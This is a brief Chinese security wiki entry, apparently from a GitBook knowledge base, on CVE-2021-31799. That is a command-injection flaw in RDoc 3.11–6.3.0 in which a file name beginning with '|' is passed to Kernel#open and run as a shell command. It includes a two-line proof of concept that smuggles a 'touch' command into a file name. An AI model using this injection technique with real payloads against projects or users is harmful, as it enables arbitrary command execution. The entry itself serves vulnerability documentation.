RDoc 命令注入(CVE-2021-31799)

RDoc调用Kernel#open打开本地文件,ruby项目中如果文件名以|开头和tags结尾,则会导致命令注入。

影响版本:

从3.11到6.3.0的所有RDoc版本

PoC:

touch "|touch cb"
rdoc "|touch cb"

ref:

Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""